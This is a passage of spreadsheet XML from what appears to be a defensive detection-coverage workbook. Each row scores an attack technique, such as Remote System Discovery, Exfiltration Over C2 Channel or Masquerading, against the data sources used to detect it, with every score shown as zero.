        <f>LOOKUP(A17,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="18" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A18" s="43" t="s">
        <v>73</v>
      </c>
      <c r="B18" s="41" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:B)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="C18" s="45"/>
      <c r="D18" s="45"/>
      <c r="E18" s="45"/>
      <c r="F18" s="14">
        <v>0</v>
      </c>
      <c r="G18" s="14">
        <v>0</v>
      </c>
      <c r="H18" s="14">
        <v>0</v>
      </c>
      <c r="I18" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K18" s="46" t="str">
        <f>LOOKUP(A18,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="19" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A19" s="43" t="s">
        <v>75</v>
      </c>
      <c r="B19" s="41" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:B)</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="C19" s="45"/>
      <c r="D19" s="45"/>
      <c r="E19" s="45"/>
      <c r="F19" s="14">
        <v>0</v>
      </c>
      <c r="G19" s="14">
        <v>0</v>
      </c>
      <c r="H19" s="14">
        <v>0</v>
      </c>
      <c r="I19" s="32">
        <f>((F19*2)+G19+(H19*2))/5</f>
        <v>0</v>
      </c>
      <c r="K19" s="46" t="str">
        <f>LOOKUP(A19,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
    </row>
    <row r="20" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A20" s="43" t="s">
        <v>77</v>
      </c>
      <c r="B20" s="41" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:B)</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="C20" s="45"/>
      <c r="D20" s="45"/>
      <c r="E20" s="45"/>
      <c r="F20" s="14">
        <v>0</v>
      </c>
      <c r="G20" s="14">
        <v>0</v>
      </c>
      <c r="H20" s="14">
        <v>0</v>
      </c>
      <c r="I20" s="32">
        <f>((F20*2)+G20+(H20*2))/5</f>
        <v>0</v>
      </c>
      <c r="K20" s="46" t="str">
        <f>LOOKUP(A20,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</v>
      </c>
    </row>
    <row r="21" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A21" s="43" t="s">
        <v>79</v>
      </c>
      <c r="B21" s="41" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:B)</f>
        <v>Automated Exfiltration</v>
      </c>
      <c r="C21" s="45"/>
      <c r="D21" s="45"/>
      <c r="E21" s="45"/>
      <c r="F21" s="14">
        <v>0</v>
      </c>
      <c r="G21" s="14">
        <v>0</v>
      </c>
      <c r="H21" s="14">
        <v>0</v>
      </c>
      <c r="I21" s="32">
        <f>((F21*2)+G21+(H21*2))/5</f>
        <v>0</v>
      </c>
      <c r="K21" s="46" t="str">
        <f>LOOKUP(A21,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process use of network</v>
      </c>
    </row>
    <row r="22" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A22" s="43" t="s">
        <v>80</v>
      </c>
      <c r="B22" s="41" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:B)</f>
        <v>Remote Services</v>
      </c>
      <c r="C22" s="45"/>
      <c r="D22" s="45"/>
      <c r="E22" s="45"/>
      <c r="F22" s="14">
        <v>0</v>
      </c>
      <c r="G22" s="14">
        <v>0</v>
      </c>
      <c r="H22" s="14">
        <v>0</v>
      </c>
      <c r="I22" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K22" s="46" t="str">
        <f>LOOKUP(A22,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Windows event logs,Process use of network,Process monitoring,Process command-line parameters,PowerShell logs,Packet capture,Network protocol analysis,Netflow/Enclave netflow,File monitoring,DLL monitoring,Authentication logs,API monitoring</v>
      </c>
    </row>
    <row r="23" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A23" s="43" t="s">
        <v>81</v>
      </c>
      <c r="B23" s="41" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C23" s="45"/>
      <c r="D23" s="45"/>
      <c r="E23" s="45"/>
      <c r="F23" s="14">
        <v>0</v>
      </c>
      <c r="G23" s="14">
        <v>0</v>
      </c>
      <c r="H23" s="14">
        <v>0</v>
      </c>
      <c r="I23" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K23" s="46" t="str">
        <f>LOOKUP(A23,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
    </row>
    <row r="24" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A24" s="43" t="s">
        <v>83</v>
      </c>
      <c r="B24" s="41" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C24" s="45"/>
      <c r="D24" s="45"/>
      <c r="E24" s="45"/>
      <c r="F24" s="14">
        <v>0</v>
      </c>
      <c r="G24" s="14">
        <v>0</v>
      </c>
      <c r="H24" s="14">
        <v>0</v>
      </c>
      <c r="I24" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K24" s="46" t="str">
        <f>LOOKUP(A24,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
    </row>
    <row r="25" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A25" s="43" t="s">
        <v>84</v>
      </c>
      <c r="B25" s="41" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:B)</f>
        <v>Windows Remote Management</v>
      </c>
      <c r="C25" s="45"/>
      <c r="D25" s="45"/>
      <c r="E25" s="45"/>
      <c r="F25" s="14">
        <v>0</v>
      </c>
      <c r="G25" s="14">
        <v>0</v>
      </c>
      <c r="H25" s="14">
        <v>0</v>
      </c>
      <c r="I25" s="32">
        <f>((F25*2)+G25+(H25*2))/5</f>
        <v>0</v>
      </c>
      <c r="K25" s="46" t="str">
        <f>LOOKUP(A25,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,Netflow/Enclave netflow,Authentication logs,File monitoring</v>
      </c>
    </row>
    <row r="26" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A26" s="43" t="s">
        <v>85</v>
      </c>
      <c r="B26" s="41" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:B)</f>
        <v>Data from Removable Media</v>
      </c>
      <c r="C26" s="45"/>
      <c r="D26" s="45"/>
      <c r="E26" s="45"/>
      <c r="F26" s="14">
        <v>0</v>
      </c>
      <c r="G26" s="14">
        <v>0</v>
      </c>
      <c r="H26" s="14">
        <v>0</v>
      </c>
      <c r="I26" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K26" s="46" t="str">
        <f>LOOKUP(A26,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="27" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A27" s="43" t="s">
        <v>86</v>
      </c>
      <c r="B27" s="41" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:B)</f>
        <v>Multiband Communication</v>
      </c>
      <c r="C27" s="45"/>
      <c r="D27" s="45"/>
      <c r="E27" s="45"/>
      <c r="F27" s="14">
        <v>0</v>
      </c>
      <c r="G27" s="14">
        <v>0</v>
      </c>
      <c r="H27" s="14">
        <v>0</v>
      </c>
      <c r="I27" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K27" s="46" t="str">
        <f>LOOKUP(A27,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</v>
      </c>
    </row>
    <row r="28" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A28" s="43" t="s">
        <v>87</v>
      </c>
      <c r="B28" s="41" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:B)</f>
        <v>Obfuscated Files or Information</v>
      </c>
      <c r="C28" s="45"/>
      <c r="D28" s="45"/>
      <c r="E28" s="45"/>
      <c r="F28" s="14">
        <v>0</v>
      </c>
      <c r="G28" s="14">
        <v>0</v>
      </c>
      <c r="H28" s="14">
        <v>0</v>
      </c>
      <c r="I28" s="32">
        <f>((F28*2)+G28+(H28*2))/5</f>
        <v>0</v>
      </c>
      <c r="K28" s="46" t="str">
        <f>LOOKUP(A28,'REF-DataSources'!A:C)</f>
        <v>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="29" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A29" s="43" t="s">
        <v>89</v>
      </c>
      <c r="B29" s="41" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:B)</f>
        <v>Indicator Removal from Tools</v>
      </c>
      <c r="C29" s="45"/>
      <c r="D29" s="45"/>
      <c r="E29" s="45"/>
      <c r="F29" s="14">
        <v>0</v>
      </c>
      <c r="G29" s="14">
        <v>0</v>
      </c>
      <c r="H29" s="14">
        <v>0</v>
      </c>
      <c r="I29" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K29" s="46" t="str">
        <f>LOOKUP(A29,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Anti-virus,Binary file metadata</v>
      </c>
    </row>
    <row r="30" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A30" s="43" t="s">
        <v>91</v>
      </c>
      <c r="B30" s="41" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:B)</f>
        <v>Scheduled Transfer</v>
      </c>
      <c r="C30" s="45"/>
      <c r="D30" s="45"/>
      <c r="E30" s="45"/>
      <c r="F30" s="14">
        <v>0</v>
      </c>
      <c r="G30" s="14">
        <v>0</v>
      </c>
      <c r="H30" s="14">
        <v>0</v>
      </c>
      <c r="I30" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K30" s="46" t="str">
        <f>LOOKUP(A30,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="31" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A31" s="43" t="s">
        <v>92</v>
      </c>
      <c r="B31" s="41" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C31" s="45"/>
      <c r="D31" s="45"/>
      <c r="E31" s="45"/>
      <c r="F31" s="14">
        <v>0</v>
      </c>
      <c r="G31" s="14">
        <v>0</v>
      </c>
      <c r="H31" s="14">
        <v>0</v>
      </c>
      <c r="I31" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K31" s="46" t="str">
        <f>LOOKUP(A31,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="32" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A32" s="43" t="s">
        <v>94</v>
      </c>
      <c r="B32" s="41" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C32" s="45"/>
      <c r="D32" s="45"/>
      <c r="E32" s="45"/>
      <c r="F32" s="14">
        <v>0</v>
      </c>
      <c r="G32" s="14">
        <v>0</v>
      </c>
      <c r="H32" s="14">
        <v>0</v>
      </c>
      <c r="I32" s="32">
        <f>((F32*2)+G32+(H32*2))/5</f>
        <v>0</v>
      </c>
      <c r="K32" s="46" t="str">
        <f>LOOKUP(A32,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="33" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A33" s="43" t="s">
        <v>96</v>
      </c>
      <c r="B33" s="41" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:B)</f>
        <v>Data Transfer Size Limits</v>
      </c>
      <c r="C33" s="45"/>
      <c r="D33" s="45"/>
      <c r="E33" s="45"/>
      <c r="F33" s="14">
        <v>0</v>
      </c>
      <c r="G33" s="14">
        <v>0</v>
      </c>
      <c r="H33" s="14">
        <v>0</v>
      </c>
      <c r="I33" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K33" s="46" t="str">
        <f>LOOKUP(A33,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="34" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A34" s="43" t="s">
        <v>98</v>
      </c>
      <c r="B34" s="41" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:B)</f>
        <v>System Owner/User Discovery</v>
      </c>
      <c r="C34" s="45"/>
      <c r="D34" s="45"/>
      <c r="E34" s="45"/>
      <c r="F34" s="14">
        <v>0</v>
      </c>
      <c r="G34" s="14">
        <v>0</v>
      </c>
      <c r="H34" s="14">
        <v>0</v>
      </c>
      <c r="I34" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K34" s="46" t="str">
        <f>LOOKUP(A34,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="35" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A35" s="43" t="s">
        <v>100</v>
      </c>
      <c r="B35" s="41" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:B)</f>
        <v>Path Interception</v>
      </c>
      <c r="C35" s="45"/>
      <c r="D35" s="45"/>
      <c r="E35" s="45"/>
      <c r="F35" s="14">
        <v>0</v>
      </c>
      <c r="G35" s="14">
        <v>0</v>
      </c>
      <c r="H35" s="14">
        <v>0</v>
      </c>
      <c r="I35" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K35" s="46" t="str">
        <f>LOOKUP(A35,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="36" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A36" s="43" t="s">
        <v>101</v>
      </c>
      <c r="B36" s="41" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:B)</f>
        <v>Path Interception</v>
      </c>
      <c r="C36" s="45"/>
      <c r="D36" s="45"/>
      <c r="E36" s="45"/>
      <c r="F36" s="14">
        <v>0</v>
      </c>
      <c r="G36" s="14">
        <v>0</v>
      </c>
      <c r="H36" s="14">
        <v>0</v>
      </c>
      <c r="I36" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K36" s="46" t="str">
        <f>LOOKUP(A36,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="37" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A37" s="43" t="s">
        <v>102</v>
      </c>
      <c r="B37" s="41" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:B)</f>
        <v>Masquerading</v>
      </c>
      <c r="C37" s="45"/>
      <c r="D37" s="45"/>
      <c r="E37" s="45"/>
      <c r="F37" s="14">
        <v>0</v>
      </c>
      <c r="G37" s="14">
        <v>0</v>
      </c>
      <c r="H37" s="14">
        <v>0</v>
      </c>
      <c r="I37" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K37" s="46" t="str">
        <f>LOOKUP(A37,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,File monitoring,Process monitoring,Binary file metadata</v>
      </c>
    </row>
    <row r="38" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A38" s="43" t="s">
        <v>103</v>
      </c>
      <c r="B38" s="41" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:B)</f>
        <v>Boot or Logon Initialization Scripts</v>
      </c>
      <c r="C38" s="45"/>
      <c r="D38" s="45"/>
      <c r="E38" s="45"/>
      <c r="F38" s="14">
        <v>0</v>
      </c>
      <c r="G38" s="14">
        <v>0</v>
      </c>
      <c r="H38" s="14">
        <v>0</v>
      </c>
      <c r="I38" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K38" s="46" t="str">
        <f>LOOKUP(A38,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="39" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A39" s="43" t="s">
        <v>105</v>
      </c>
      <c r="B39" s="41" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:B)</f>
        <v>Startup Items</v>
      </c>
      <c r="C39" s="45"/>
      <c r="D39" s="45"/>
      <c r="E39" s="45"/>
      <c r="F39" s="14">
        <v>0</v>
      </c>
      <c r="G39" s="14">
        <v>0</v>
      </c>
      <c r="H39" s="14">
        <v>0</v>
      </c>
      <c r="I39" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K39" s="46" t="str">
        <f>LOOKUP(A39,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="40" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A40" s="43" t="s">
        <v>106</v>
      </c>
      <c r="B40" s="41" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:B)</f>
        <v>Data from Network Shared Drive</v>
      </c>
      <c r="C40" s="45"/>
      <c r="D40" s="45"/>
      <c r="E40" s="45"/>
      <c r="F40" s="14">
        <v>0</v>
      </c>
      <c r="G40" s="14">
        <v>0</v>
      </c>
      <c r="H40" s="14">
        <v>0</v>
      </c>
      <c r="I40" s="32">
        <f>((F40*2)+G40+(H40*2))/5</f>
        <v>0</v>
      </c>
      <c r="K40" s="46" t="str">
        <f>LOOKUP(A40,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="41" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A41" s="43" t="s">
        <v>108</v>
      </c>
      <c r="B41" s="41" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:B)</f>
        <v>Network Sniffing</v>
      </c>
      <c r="C41" s="45"/>
      <c r="D41" s="45"/>
      <c r="E41" s="45"/>
      <c r="F41" s="14">
        <v>0</v>
      </c>
      <c r="G41" s="14">
        <v>0</v>
      </c>
      <c r="H41" s="14">
        <v>0</v>
      </c>
      <c r="I41" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K41" s="46" t="str">
        <f>LOOKUP(A41,'REF-DataSources'!A:C)</f>
        <v>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</v>
      </c>
    </row>
    <row r="42" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A42" s="43" t="s">
        <v>110</v>
      </c>
      <c r="B42" s="41" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="C42" s="45"/>
      <c r="D42" s="45"/>
      <c r="E42" s="45"/>
      <c r="F42" s="14">
        <v>0</v>
      </c>
      <c r="G42" s="14">
        <v>0</v>
      </c>
      <c r="H42" s="14">
        <v>0</v>
      </c>
      <c r="I42" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K42" s="46" t="str">
        <f>LOOKUP(A42,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</v>
      </c>
    </row>
    <row r="43" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A43" s="43" t="s">
        <v>112</v>
      </c>
      <c r="B43" s="41" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over C2 Channel</v>
      </c>
      <c r="C43" s="45"/>
      <c r="D43" s="45"/>
      <c r="E43" s="45"/>
      <c r="F43" s="14">
        <v>0</v>
      </c>
      <c r="G43" s="14">
        <v>0</v>
      </c>
      <c r="H43" s="14">
        <v>0</v>
      </c>
      <c r="I43" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K43" s="46" t="str">
        <f>LOOKUP(A43,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Process use of network,Netflow/Enclave netflow,Process monitoring</v>
      </c>
    </row>
    <row r="44" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A44" s="43" t="s">
        <v>113</v>
      </c>
      <c r="B44" s="41" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C44" s="45"/>
      <c r="D44" s="45"/>
      <c r="E44" s="45"/>
      <c r="F44" s="14">
        <v>0</v>
      </c>
      <c r="G44" s="14">
        <v>0</v>
      </c>
      <c r="H44" s="14">
        <v>0</v>
      </c>
      <c r="I44" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K44" s="46" t="str">
        <f>LOOKUP(A44,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="45" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A45" s="43" t="s">
        <v>115</v>
      </c>
      <c r="B45" s="41" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C45" s="45"/>
      <c r="D45" s="45"/>
      <c r="E45" s="45"/>
      <c r="F45" s="14">
        <v>0</v>
      </c>
      <c r="G45" s="14">
        <v>0</v>
      </c>
      <c r="H45" s="14">
        <v>0</v>
      </c>
      <c r="I45" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K45" s="46" t="str">
        <f>LOOKUP(A45,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="46" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A46" s="43" t="s">
        <v>116</v>
      </c>
      <c r="B46" s="41" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:B)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="C46" s="45"/>
      <c r="D46" s="45"/>
      <c r="E46" s="45"/>
      <c r="F46" s="14">
        <v>0</v>
      </c>
      <c r="G46" s="14">
        <v>0</v>
      </c>
      <c r="H46" s="14">
        <v>0</v>
      </c>
      <c r="I46" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K46" s="46" t="str">
        <f>LOOKUP(A46,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</v>
      </c>
    </row>
    <row r="47" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A47" s="43" t="s">
        <v>117</v>
      </c>
      <c r="B47" s="41" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:B)</f>
        <v>Network Service Scanning</v>
      </c>
      <c r="C47" s="45"/>
      <c r="D47" s="45"/>
      <c r="E47" s="45"/>
      <c r="F47" s="14">
        <v>0</v>
      </c>
      <c r="G47" s="14">
        <v>0</v>
      </c>
      <c r="H47" s="14">
        <v>0</v>
      </c>
      <c r="I47" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K47" s="46" t="str">
        <f>LOOKUP(A47,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</v>
      </c>
    </row>
    <row r="48" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A48" s="43" t="s">
        <v>118</v>
      </c>
      <c r="B48" s="41" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:B)</f>
        <v>Windows Management Instrumentation</v>
      </c>
      <c r="C48" s="45"/>
      <c r="D48" s="45"/>
      <c r="E48" s="45"/>
      <c r="F48" s="14">
        <v>0</v>
      </c>
      <c r="G48" s="14">
        <v>0</v>
      </c>
      <c r="H48" s="14">
        <v>0</v>
      </c>
      <c r="I48" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K48" s="46" t="str">
        <f>LOOKUP(A48,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="49" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A49" s="43" t="s">
        <v>119</v>
      </c>
      <c r="B49" s="41" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Alternative Protocol</v>
      </c>
      <c r="C49" s="45"/>
      <c r="D49" s="45"/>
      <c r="E49" s="45"/>
      <c r="F49" s="14">
        <v>0</v>
      </c>
      <c r="G49" s="14">
        <v>0</v>
      </c>
      <c r="H49" s="14">
        <v>0</v>
      </c>
      <c r="I49" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K49" s="46" t="str">
        <f>LOOKUP(A49,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</v>
      </c>
    </row>
    <row r="50" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A50" s="43" t="s">
        <v>121</v>
      </c>
      <c r="B50" s="41" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:B)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="C50" s="45"/>
      <c r="D50" s="45"/>
      <c r="E50" s="45"/>
      <c r="F50" s="14">
        <v>0</v>
      </c>
      <c r="G50" s="14">
        <v>0</v>
      </c>
      <c r="H50" s="14">
        <v>0</v>
      </c>
      <c r="I50" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K50" s="46" t="str">
        <f>LOOKUP(A50,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="51" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A51" s="43" t="s">
        <v>123</v>
      </c>
      <c r="B51" s="41" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:B)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="C51" s="45"/>
      <c r="D51" s="45"/>
      <c r="E51" s="45"/>
      <c r="F51" s="14">
        <v>0</v>
      </c>
      <c r="G51" s="14">
        <v>0</v>
      </c>
      <c r="H51" s="14">
        <v>0</v>
      </c>
      <c r="I51" s="32">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K51" s="46" t="str">
        <f>LOOKUP(A51,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
    </row>
    <row r="52" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A52" s="43" t="s">
        <v>124</v>
      </c>
      <c r="B52" s="41" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:B)</f>
        <v>Shared Webroot</v>
      </c>
      <c r="C52" s="45"/>
      <c r="D52" s="45"/>
      <c r="E52" s="45"/>
      <c r="F52" s="14">
        <v>0</v>
      </c>
      <c r="G52" s="14">
        <v>0</v>
      </c>
      <c r="H52" s="14">
        <v>0</v>
      </c>
      <c r="I52" s="32">
        <f>((F52*2)+G52+(H52*2))/5</f>
        <v>0</v>
      </c>
      <c r="K52" s="46" t="str">
        <f>LOOKUP(A52,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring</v>
      </c>
    </row>
    <row r="53" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A53" s="43" t="s">
        <v>125</v>
      </c>
      <c r="B53" s="41" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:B)</f>
        <v>Exfiltration Over Physical Medium</v>
      </c>
      <c r="C53" s="45"/>
      <c r="D53" s="45"/>
      <c r="E53" s="45"/>
      <c r="F53" s="14">
        <v>0</v>
      </c>
      <c r="G53" s="14">
        <v>0</v>
      </c>
      <c r="H53" s="14">
        <v>0</v>
      </c>
      <c r="I53" s="32">
        <f>((F53*2)+G53+(H53*2))/5</f>
        <v>0</v>
      </c>
      <c r="K53" s="46" t="str">
        <f>LOOKUP(A53,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Data loss prevention,File monitoring</v>
      </c>
    </row>
    <row r="54" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A54" s="43" t="s">
        <v>127</v>
      </c>
      <c r="B54" s="41" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:B)</f>
        <v>Scheduled Task/Job</v>
      </c>
      <c r="C54" s="45"/>
      <c r="D54" s="45"/>
      <c r="E54" s="45"/>
      <c r="F54" s="14">
        <v>0</v>
      </c>
      <c r="G54" s="14">
        <v>0</v>
      </c>
      <c r="H54" s="14">
        <v>0</v>
      </c>
      <c r="I54" s="32">
        <f>((F54*2)+G54+(H54*2))/5</f>
        <v>0</v>
      </c>
      <c r="K54" s="46" t="str">
        <f>LOOKUP(A54,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
    </row>
    <row r="55" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A55" s="43" t="s">
        <v>129</v>
      </c>
      <c r="B55" s="41" t="str">
